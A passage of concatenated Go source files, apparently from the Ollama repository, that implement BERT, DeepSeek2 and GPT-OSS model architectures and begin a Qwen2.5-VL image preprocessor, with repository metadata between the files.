m.eps) for _, layer := range m.Layers { hiddenStates = layer.Forward(ctx, hiddenStates, &m.Options) } hiddenStates = m.poolingType.Forward(ctx, hiddenStates) if m.normalize { hiddenStates = hiddenStates.L2Norm(ctx, 1e-12) } return hiddenStates, nil } type EncoderLayer struct { *Attention AttentionNorm *nn.LayerNorm `gguf:"attn_output_norm"` *MLP MLPNorm *nn.LayerNorm `gguf:"layer_output_norm"` } func (e *EncoderLayer) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { // Attention residual := hiddenStates hiddenStates = e.Attention.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) hiddenStates = e.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) // MLP residual = hiddenStates hiddenStates = e.MLP.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) hiddenStates = e.MLPNorm.Forward(ctx, hiddenStates, opts.eps) return hiddenStates } type Attention struct { Query *nn.Linear `gguf:"attn_q"` QueryNorm *nn.LayerNorm `gguf:"attn_q_norm"` Key *nn.Linear `gguf:"attn_k"` KeyNorm *nn.LayerNorm `gguf:"attn_k_norm"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (a *Attention) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { batchSize := hiddenStates.Dim(1) query := a.Query.Forward(ctx, hiddenStates) if a.QueryNorm != nil { query = a.QueryNorm.Forward(ctx, query, opts.eps) } query = query.Reshape(ctx, opts.headDim(), opts.numHeads, batchSize) key := a.Key.Forward(ctx, hiddenStates) if a.KeyNorm != nil { key = a.KeyNorm.Forward(ctx, key, opts.eps) } key = key.Reshape(ctx, opts.headDim(), cmp.Or(opts.numKVHeads, opts.numHeads), batchSize) value := a.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, opts.headDim(), cmp.Or(opts.numKVHeads, opts.numHeads), batchSize) attention := nn.Attention(ctx, query, key, value, 1/math.Sqrt(float64(opts.headDim())), nil) attention = attention.Reshape(ctx, opts.hiddenSize, batchSize) return a.Output.Forward(ctx, attention) } type MLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (m *MLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { return m.Down.Forward(ctx, m.Up.Forward(ctx, hiddenStates).GELU(ctx)) } type Options struct { hiddenSize, numHeads, numKVHeads, keyLength, valueLength int poolingType pooling.Type eps float32 normalize bool } func (o Options) headDim() int { return cmp.Or(o.keyLength, o.valueLength, o.hiddenSize/o.numHeads) } func New(c fs.Config) (model.Model, error) { vocab := &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{ int32(cmp.Or( c.Uint("tokenizer.ggml.cls_token_id"), c.Uint("tokenizer.ggml.bos_token_id"), )), }, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", true), EOS: []int32{ int32(cmp.Or( c.Uint("tokenizer.ggml.separator_token_id"), //nolint:misspell // NOTE: "seperator_token_id" is a typo in model metadata but we need to // support it for compatibility. c.Uint("tokenizer.ggml.seperator_token_id"), c.Uint("tokenizer.ggml.eos_token_id"), )), }, } var processor model.TextProcessor switch c.String("tokenizer.ggml.model", "bert") { case "bert": processor = model.NewWordPiece(vocab, true) default: return nil, model.ErrUnsupportedTokenizer } return &Model{ TextProcessor: processor, Layers: make([]EncoderLayer, c.Uint("block_count")), Options: Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), eps: c.Float("attention.layer_norm_epsilon"), poolingType: pooling.Type(c.Uint("pooling_type")), normalize: c.Bool("normalize_embeddings", true), }, }, nil } func init() { model.Register("bert", New) model.Register("bert_embed", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseek2/model.go
model/models/deepseek2/model.go
package deepseek2 // uses deepseek 2 architecture but written based on deepseek 3 model import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Options struct { isMLA bool numExpertsUsed int numExperts int normTopKProb bool routedScalingFactor float32 kvLoraRank, qkNopeHeadDim, qkRopeHeadDim, kqNopeHeadDim, qkHeadDim int qLoraRank int vHeadDim int hiddenSize, numHeads, numKVHeads, originalContextLength int eps, ropeBase, ropeScale float32 kqScale float64 } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, t, p ml.Tensor) ml.Tensor { return nn.RoPE(ctx, t, p, o.qkRopeHeadDim, o.ropeBase, 1./o.ropeScale, rope.WithOriginalContextLength(o.originalContextLength), rope.WithExtrapolationFactor(1.), rope.WithAttentionFactor(float32(1.0/(1.0+0.1*math.Log(float64(o.ropeScale))))), ) } type Attention struct { Q *nn.Linear `gguf:"attn_q"` QA *nn.Linear `gguf:"attn_q_a"` QANorm *nn.RMSNorm `gguf:"attn_q_a_norm"` QB *nn.Linear `gguf:"attn_q_b"` KVA *nn.Linear `gguf:"attn_kv_a_mqa"` KVANorm *nn.RMSNorm `gguf:"attn_kv_a_norm"` KVB *nn.Linear `gguf:"attn_kv_b"` KB *nn.Linear `gguf:"attn_k_b"` VB *nn.Linear `gguf:"attn_v_b"` Output *nn.Linear `gguf:"attn_out,alt:attn_output"` } func (attn *Attention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { seqLength := hiddenStates.Dim(1) var query ml.Tensor if opts.qLoraRank == 0 { query = attn.Q.Forward(ctx, hiddenStates) } else { query = attn.QA.Forward(ctx, hiddenStates) query = attn.QANorm.Forward(ctx, query, opts.eps) query = attn.QB.Forward(ctx, query) } query = query.Reshape(ctx, query.Dim(0)/opts.numHeads, opts.numHeads, seqLength) queryChunks := query.ChunkSections(ctx, 0, opts.qkNopeHeadDim, opts.qkRopeHeadDim) compressedKV := attn.KVA.Forward(ctx, hiddenStates) kPass := compressedKV.Slice(ctx, 0, 0, opts.kvLoraRank, 1) kRot := compressedKV.View(ctx, opts.kvLoraRank*compressedKV.Stride(0), opts.qkRopeHeadDim, compressedKV.Stride(1), 1, compressedKV.Stride(1), compressedKV.Dim(1), ) qRot := opts.applyRotaryPositionEmbeddings(ctx, queryChunks[1], positions) kRot = opts.applyRotaryPositionEmbeddings(ctx, kRot, positions) kPass = attn.KVANorm.Forward(ctx, kPass, opts.eps) var attention ml.Tensor if !opts.isMLA { // v3 kPass = attn.KVB.Forward(ctx, kPass) kv := kPass.Reshape(ctx, kPass.Dim(0)/opts.numKVHeads, opts.numKVHeads, seqLength) kvChunks := kv.ChunkSections(ctx, 0, opts.kqNopeHeadDim, opts.vHeadDim) kRot = kRot.Repeat(ctx, 1, queryChunks[0].Dim(1)) query = qRot.Concat(ctx, queryChunks[0], 0) key := kRot.Concat(ctx, kvChunks[0], 0) attention = nn.Attention(ctx, query, key, kvChunks[1], opts.kqScale, cache) } else { // v3.1 qPass := queryChunks[0].Permute(ctx, 0, 2, 1, 3) qPassAbsorb := attn.KB.Forward(ctx, qPass) qPassAbsorb = qPassAbsorb.Permute(ctx, 0, 2, 1, 3) query = qRot.Concat(ctx, qPassAbsorb, 0) kPass = kPass.Reshape(ctx, opts.kvLoraRank, 1, seqLength) key := kRot.Concat(ctx, kPass, 0) value := kPass attention = nn.AttentionWithVMLA(ctx, query, key, value, nil, attn.VB.Weight, opts.kqScale, cache) } attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), seqLength) return attn.Output.Forward(ctx, attention) } type MLP interface { Forward(ml.Context, ml.Tensor, *Options) ml.Tensor } type sparse struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Gate *nn.Linear `gguf:"ffn_gate_exps"` Up *nn.Linear `gguf:"ffn_up_exps"` Down *nn.Linear `gguf:"ffn_down_exps"` SharedExpert *dense `gguf:",suf:_shexp"` ExpProbsBias ml.Tensor `gguf:"exp_probs_b.bias,alt:exp_probs_b"` } func (moe *sparse) Moe(ctx ml.Context, hiddenStates, topKIndices, topKWeights ml.Tensor, opts *Options) ml.Tensor { hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) upStates := moe.Up.Weight.MulmatID(ctx, hiddenStates, topKIndices) hiddenStates = moe.Gate.Weight.MulmatID(ctx, hiddenStates, topKIndices) hiddenStates = hiddenStates.SILU(ctx, upStates) experts := moe.Down.Weight.MulmatID(ctx, hiddenStates, topKIndices) experts = experts.Mul(ctx, topKWeights) nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), experts.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2))) } return nextStates } func (moe *sparse) topKIndices(ctx ml.Context, scores ml.Tensor, opts *Options) ml.Tensor { if moe.ExpProbsBias != nil { scores = scores.Add(ctx, moe.ExpProbsBias) } topKIndices := scores.TopK(ctx, opts.numExpertsUsed) return topKIndices } func (moe *sparse) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { residuals := hiddenStates routerLogits := moe.Router.Forward(ctx, hiddenStates) scores := routerLogits.Sigmoid(ctx) topKIndices := moe.topKIndices(ctx, scores, opts) topKWeights := scores.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, topKIndices) if opts.normTopKProb { topKWeights = topKWeights.Reshape(ctx, opts.numExpertsUsed, hiddenStates.Dim(1)) topKWeights = topKWeights.Div(ctx, topKWeights.SumRows(ctx)) topKWeights = topKWeights.Reshape(ctx, 1, opts.numExpertsUsed, hiddenStates.Dim(1)) } topKWeights = topKWeights.Scale(ctx, float64(opts.routedScalingFactor)) hiddenStates = moe.Moe(ctx, hiddenStates, topKIndices, topKWeights, opts) sharedExpertResult := moe.SharedExpert.Forward(ctx, residuals, opts) hiddenStates = hiddenStates.Add(ctx, sharedExpertResult) return hiddenStates } type dense struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *dense) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type Layer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` Attention *Attention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP MLP } func (t *Layer) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { residual := hiddenStates hiddenStates = t.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = t.Attention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = t.MLPNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = t.MLP.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) return hiddenStates } type Model struct { model.Base model.BytePairEncoding TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []Layer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` *Options } func New(c fs.Config) (model.Model, error) { layers := make([]Layer, c.Uint("block_count")) firstDenseLayerIndex := int(c.Uint("leading_dense_block_count")) for i := range layers { if i < firstDenseLayerIndex { layers[i].MLP = &dense{} } else { layers[i].MLP = &sparse{} } } mScale := float32(1.0 + float64(c.Float("rope.scaling.yarn_log_multiplier"))*math.Log(float64(c.Float("rope.scaling.factor")))) kqScale := float64(mScale) * float64(mScale) / math.Sqrt(float64(c.Uint("attention.key_length"))) isMLA := c.Uint("attention.key_length_mla") != 0 && c.Uint("attention.value_length_mla") != 0 keyLength := int(cmp.Or(c.Uint("attention.key_length_mla"), c.Uint("attention.key_length"))) valueLength := int(cmp.Or(c.Uint("attention.value_length_mla"), c.Uint("attention.value_length"))) var pre []string switch c.String("tokenizer.ggml.pre") { case "deepseek-v3": pre = []string{ // Split regex into multiple parts (according to DeepSeek3's regex) "\\p{N}{1,3}", `[一-龥぀-ゟ゠-ヿ]+`, "[!\"#$%&'()*+,\\-./:;<=>?@\\[\\\\\\]^_`{|}~][A-Za-z]+|[^\r\n\\p{L}\\p{P}\\p{S}]?[\\p{L}\\p{M}]+| ?[\\p{P}\\p{S}]+[\r\n]*|\\s*[\r\n]+|\\s+(?!\\S)|\\s+", } case "deepseek-llm": // TODO: these models haven't been vetted so skip for now // pre = []string{ // "[\r\n]", // "\\s?[A-Za-zµÀ-ÖØ-öø-ƺƼ-ƿDŽ-ʓʕ-ʯͰ-ͳͶͷͻ-ͽͿΆΈ-ΊΌΎ-ΡΣ-ϵϷ-ҁҊ-ԯԱ-ՖႠ-ჅᎠ-Ᏽᏸ-ᏽᲐ-ᲺᲽ-Ჿᴀ-ᴫᵫ-ᵷᵹ-ᶚḀ-ἕἘ-Ἕἠ-ὅὈ-Ὅὐ-ὗὙὛὝὟ-ώᾀ-ᾴᾶ-ᾼιῂ-ῄῆ-ῌῐ-ΐῖ-Ίῠ-Ῥῲ-ῴῶ-ῼℂℇℊ-ℓℕℙ-ℝℤΩℨK-ℭℯ-ℴℹℼ-ℿⅅ-ⅉⅎↃↄⰀ-ⱻⱾ-ⳤⳫ-ⳮⳲⳳꙀ-ꙭꚀ-ꚛꜢ-ꝯꝱ-ꞇꞋ-ꞎꭰ-ꮿff-stﬓ-ﬗA-Za-z𐐀-𐑏𐒰-𐓓𐓘-𐓻𐲀-𐲲𐳀-𐳲𑢠-𑣟𞤀-𞥃]+", // "\\s?[!-/:-~!-/:-~‘-‟ -。]+", // "\\s+$", // "[一-龥ࠀ-一가-퟿]+", // "[0-9]", // } fallthrough default: return nil, model.ErrUnsupportedTokenizer } m := Model{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, pre..., ), Layers: layers, Options: &Options{ isMLA: isMLA, hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), normTopKProb: c.Bool("expert_weights_norm", true), qLoraRank: int(c.Uint("attention.q_lora_rank")), kvLoraRank: int(c.Uint("attention.kv_lora_rank")), qkHeadDim: keyLength, vHeadDim: valueLength, qkRopeHeadDim: int(c.Uint("rope.dimension_count")), qkNopeHeadDim: keyLength - int(c.Uint("rope.dimension_count")), kqNopeHeadDim: keyLength - int(c.Uint("rope.dimension_count")), routedScalingFactor: c.Float("expert_weights_scale"), originalContextLength: int(c.Uint("rope.scaling.original_context_length")), kqScale: kqScale, }, } m.Cache = kvcache.NewCausalCache(m.Shift) return &m, nil } func (m Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) for i, layer := range m.Layers { m.Cache.SetLayer(i) var outputs ml.Tensor if i == len(m.Layers)-1 { outputs = batch.Outputs } hiddenStates = layer.Forward(ctx, hiddenStates, positions, outputs, m.Cache, m.Options) } hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps) return m.Output.Forward(ctx, hiddenStates), nil } func init() { model.Register("deepseek2", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gptoss/model.go
model/models/gptoss/model.go
package gptoss import ( "cmp" "math" "strings" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Transformer struct { model.Base model.BytePairEncoding TokenEmbedding *nn.Embedding `gguf:"token_embd"` TransformerBlocks []TransformerBlock `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Options } // Forward implements model.Model. func (m *Transformer) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) for i, block := range m.TransformerBlocks { m.Cache.SetLayer(i) if c, ok := m.Cache.(*kvcache.WrapperCache); ok { // Even layers are sliding window attention. c.SetLayerType(i % 2) } var outputs ml.Tensor if i == len(m.TransformerBlocks)-1 { outputs = batch.Outputs } hiddenStates = block.Forward(ctx, hiddenStates, positions, outputs, m.Cache, &m.Options) } hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps) return m.Output.Forward(ctx, hiddenStates), nil } func (m *Transformer) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil } type Options struct { hiddenSize, numHeads, numKVHeads, keyLength, valueLength, numExperts, numExpertsUsed, originalContextLength int eps, ropeBase, ropeScale float32 } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.headDim(), o.ropeBase, 1./o.ropeScale, rope.WithTypeNeoX(), rope.WithOriginalContextLength(o.originalContextLength), rope.WithExtrapolationFactor(1.), // NOTE: ggml sets this implicitly so there's no need to set it here // rope.WithAttentionFactor(0.1*float32(math.Log(float64(o.ropeScale))) + 1.0), ) } func (o Options) headDim() int { return cmp.Or(o.keyLength, o.valueLength, o.hiddenSize/o.numHeads) } type TransformerBlock struct { Attention *AttentionBlock MLP *MLPBlock } func (d *TransformerBlock) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { hiddenStates = d.Attention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) } hiddenStates = d.MLP.Forward(ctx, hiddenStates, opts) return hiddenStates } type AttentionBlock struct { Norm *nn.RMSNorm `gguf:"attn_norm"` QKV *nn.Linear `gguf:"attn_qkv"` Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_out,alt:attn_output"` Sinks ml.Tensor `gguf:"attn_sinks,alt:attn_sinks.weight"` } func (attn *AttentionBlock) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { batchSize := hiddenStates.Dim(1) residual := hiddenStates hiddenStates = attn.Norm.Forward(ctx, hiddenStates, opts.eps) var query, key, value ml.Tensor if attn.QKV != nil { qkv := attn.QKV.Forward(ctx, hiddenStates) qkv = qkv.Reshape(ctx, opts.headDim(), -1, batchSize) chunks := qkv.ChunkSections(ctx, 1, opts.numHeads, opts.numKVHeads, opts.numKVHeads) query, key, value = chunks[0], chunks[1], chunks[2] } else { query = attn.Query.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, batchSize) key = attn.Key.Forward(ctx, hiddenStates) key = key.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) value = attn.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) } query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.AttentionWithSinks(ctx, query, key, value, attn.Sinks, 1/math.Sqrt(float64(opts.headDim())), cache) attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), batchSize) return attn.Output.Forward(ctx, attention).Add(ctx, residual) } type MLPBlock struct { Norm *nn.RMSNorm `gguf:"ffn_norm,alt:post_attention_norm"` Router *nn.Linear `gguf:"ffn_gate_inp"` GateUp *nn.LinearBatch `gguf:"ffn_gate_up_exps"` Gate *nn.LinearBatch `gguf:"ffn_gate_exps"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` } func (mlp *MLPBlock) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { hiddenDim, sequenceLength, batchSize := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) residual := hiddenStates hiddenStates = mlp.Norm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = hiddenStates.Reshape(ctx, hiddenDim, sequenceLength*batchSize) routingWeights := mlp.Router.Forward(ctx, hiddenStates) selectedExperts := routingWeights.TopK(ctx, opts.numExpertsUsed) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExperts, sequenceLength*batchSize).Rows(ctx, selectedExperts) routingWeights = routingWeights.Reshape(ctx, opts.numExpertsUsed, sequenceLength*batchSize).Softmax(ctx) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExpertsUsed, sequenceLength*batchSize) hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) var gate, up ml.Tensor if mlp.GateUp != nil { hiddenStates = mlp.GateUp.Forward(ctx, hiddenStates, selectedExperts) gate = hiddenStates.Slice(ctx, 0, 0, hiddenStates.Dim(0), 2) up = hiddenStates.Slice(ctx, 0, 1, hiddenStates.Dim(0), 2) } else { gate = mlp.Gate.Forward(ctx, hiddenStates, selectedExperts) up = mlp.Up.Forward(ctx, hiddenStates, selectedExperts) } hiddenStates = gate.SILUAlphaLimit(ctx, up, 1.702, 7) experts := mlp.Down.Forward(ctx, hiddenStates, selectedExperts) experts = experts.Mul(ctx, routingWeights) nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), experts.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2))) } return nextStates.Add(ctx, residual) } func New(c fs.Config) (model.Model, error) { m := Transformer{ TransformerBlocks: make([]TransformerBlock, c.Uint("block_count")), BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", false), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, strings.Join([]string{ `[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]*[\p{Ll}\p{Lm}\p{Lo}\p{M}]+(?i:'s|'t|'re|'ve|'m|'ll|'d)?`, `[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]+[\p{Ll}\p{Lm}\p{Lo}\p{M}]*(?i:'s|'t|'re|'ve|'m|'ll|'d)?`, `\p{N}{1,3}`, ` ?[^\s\p{L}\p{N}]+[\r\n/]*`, `\s*[\r\n]+`, `\s+(?!\S)`, `\s+`, }, "|"), ), Options: Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), keyLength: int(c.Uint("attention.key_length")), valueLength: int(c.Uint("attention.value_length")), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1.), originalContextLength: int(c.Uint("rope.scaling.original_context_length")), }, } m.Cache = kvcache.NewWrapperCache( kvcache.NewSWAMemCache(int32(c.Uint("attention.sliding_window")), 4096, m.Shift), kvcache.NewCausalCache(m.Shift), ) return &m, nil } func init() { model.Register("gptoss", New) model.Register("gpt-oss", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen25vl/process_image.go
model/models/qwen25vl/process_image.go
package qwen25vl import ( "fmt" "image" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/model/imageproc" ) // ImageProcessor contains configuration for the Qwen 2.5 VL image processing type ImageProcessor struct { numChannels int patchSize int temporalPatchSize int mergeSize int minPixels int maxPixels int factor int rescaleFactor float32 imageMean [3]float32 imageStd [3]float32 } // newImageProcessor creates a new image processor with default values func newImageProcessor(c fs.Config) ImageProcessor { patchSize := int(c.Uint("vision.patch_size", 14)) mergeSize := int(c.Uint("vision.spatial_merge_size", 2)) return ImageProcessor{ numChannels: int(c.Uint("vision.num_channels", 3)), // not set patchSize: patchSize, temporalPatchSize: 2, mergeSize: mergeSize, minPixels: 56 * 56, maxPixels: int(c.Uint("vision.max_pixels", 2<<20)), // 2M limit factor: patchSize * mergeSize, rescaleFactor: 1.0 / 255.0, imageMean: imageproc.ClipDefaultMean, imageStd: imageproc.ClipDefaultSTD, } } // SmartResize implements the smart resize algorithm func (p *ImageProcessor) SmartResize(height, width int) (int, int) { factor := p.factor if height < factor || width < factor { panic(fmt.Sprintf("height:%d or width:%d must be larger than factor:%d", height, width, factor)) } else if aspectRatio := max(height, width) / min(height, width); aspectRatio > 200 { panic(fmt.Sprintf("absolute aspect ratio must be smaller than 200, got %v", aspectRatio)) } round := func(x float64) int { return int(math.RoundToEven(x)) } hBar := round(float64(height)/float64(factor)) * factor wBar := round(float64(width)/float64(factor)) * factor if hBar*wBar > p.maxPixels { beta := math.Sqrt(float64(height*width) / float64(p.maxPixels)) hBar = int(math.Floor(float64(height)/beta/float64(factor))) * factor wBar = int(math.Floor(float64(width)/beta/float64(factor))) * factor } else if hBar*wBar < p.minPixels { beta := math.Sqrt(float64(p.minPixels) / float64(height*width)) hBar = int(math.Ceil(float64(height)*beta/float64(factor))) * factor wBar = int(math.Ceil(float64(width)*beta/float64(factor))) * factor } return hBar, wBar } type Grid struct { Height int Width int Temporal int } func (p *ImageProcessor) ProcessImage(img image.Image) ([]float32, *Grid, error) { img = imageproc.Composite(img) origWidth := img.Bounds().Dx() origHeight := img.Bounds().Dy() // Calculate smart resize dimensions resizedHeight, resizedWidth := p.SmartResize(origHeight, origWidth) // Resize image using existing functions resizedImg := imageproc.Resize(img, image.Point{X: resizedWidth, Y: resizedHeight}, imageproc.ResizeBilinear) normalizedPixels := imageproc.Normalize(resizedImg, p.imageMean, p.imageStd, true, true) // Calculate grid dimensions grid := &Grid{ Height: resizedHeight / p.patchSize, Width: resizedWidth / p.patchSize, Temporal: 1, // For single images, temporal dimension is 1 } patches, err := p.createPatches(normalizedPixels, resizedHeight, resizedWidth, grid) if err != nil { return nil, nil, fmt.Errorf("failed to create patches: %v", err) } // Return patches and grid dimensions return patches, grid, nil } func (p *ImageProcessor) createPatches(pixels []float32, height, width int, grid *Grid) ([]float32, error) { channels := p.numChannels patchSize := p.patchSize mergeSize := p.mergeSize temporalPatchSize := p.temporalPatchSize // Calculate output dimensions numPatches := grid.Temporal * grid.Height * grid.Width patchDim := channels * temporalPatchSize * patchSize * patchSize result := make([]float32, numPatches*patchDim) patchIndex := 0 // Single temporal frame handling (copies to all frames) for range grid.Temporal { for h := 0; h < grid.Height; h += mergeSize { for w := 0; w < grid.Width; w += mergeSize { // Handle the 2x2 merged patches for mh := range mergeSize { for mw := range mergeSize { baseOffset := patchIndex * patchDim // Extract patch data for first temporal frame for c := range channels { channelOffset := baseOffset + (c * temporalPatchSize * patchSize * patchSize) for py := range patchSize { for px := range patchSize { // Calculate source pixel coordinates y := (h+mh)*patchSize + py x := (w+mw)*patchSize + px // Source index in input tensor (CHW format) srcIdx := c*height*width + y*width + x // Destination index in first temporal frame dstIdx := channelOffset + (py * patchSize) + px if srcIdx < len(pixels) && dstIdx < len(result) { result[dstIdx] = pixels[srcIdx] } } } } // Copy first 